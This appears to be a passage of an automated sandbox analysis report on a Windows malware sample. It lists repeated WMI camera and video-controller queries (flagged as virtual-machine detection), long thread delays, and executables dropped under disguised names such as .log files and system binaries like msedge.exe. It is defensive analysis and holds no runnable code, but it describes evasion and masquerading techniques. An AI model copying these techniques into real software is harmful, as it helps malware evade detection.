                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1ACF0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 1ADB0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 1B200000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 16C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1B240000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: D50000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: FE0000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: BB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1A750000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1880000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1B320000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: E50000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: D20000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeMemory allocated: 1A830000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 15D0000 memory reserve | memory write watch
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 599843
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 599625
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598524
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598234
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 598077
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 3600000
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597718
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597541
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597404
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597275
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597153
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 597046
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596933
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596813
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596557
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 596015
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595825
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595640
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595468
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595265
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 595120
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594988
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594859
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594723
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594598
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 594468
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3024Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1235
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1180
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1788
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1264
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1139
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1199
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1151
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1401
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1304
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1344
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1360
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1173
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1607
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1378
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWindow / User API: threadDelayed 7767
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeWindow / User API: threadDelayed 1730
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\bIYNCAnX.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\PNvPNCKx.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\QZUgHzbG.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHSRySXa.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\zKTiJdVm.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\JTIguxNU.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\MlnyqaSB.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\XjppJZgg.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\ioFvQtnJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\wQQSSdrw.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\AKEAUBbV.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\VNlekvqu.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\aZffRVgZ.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\RORqBBDl.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\qhLtZjFE.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\LeSOATlM.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\vcMKgPvy.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\xYZkNoRc.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\OXbzuEDs.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\HobYtWlT.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\taabLgrD.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\koiTwEAQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\LmCheCMS.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\cmFWEbPY.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\ohiUtZsx.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\fXkmLoaR.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\mcmciRwO.logJump to dropped file
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDropped PE file which has not been started: C:\Users\user\Desktop\GzkiCFwe.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\HyVANeDN.logJump to dropped file
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeDropped PE file which has not been started: C:\Users\user\Desktop\oXLUJmZB.logJump to dropped file
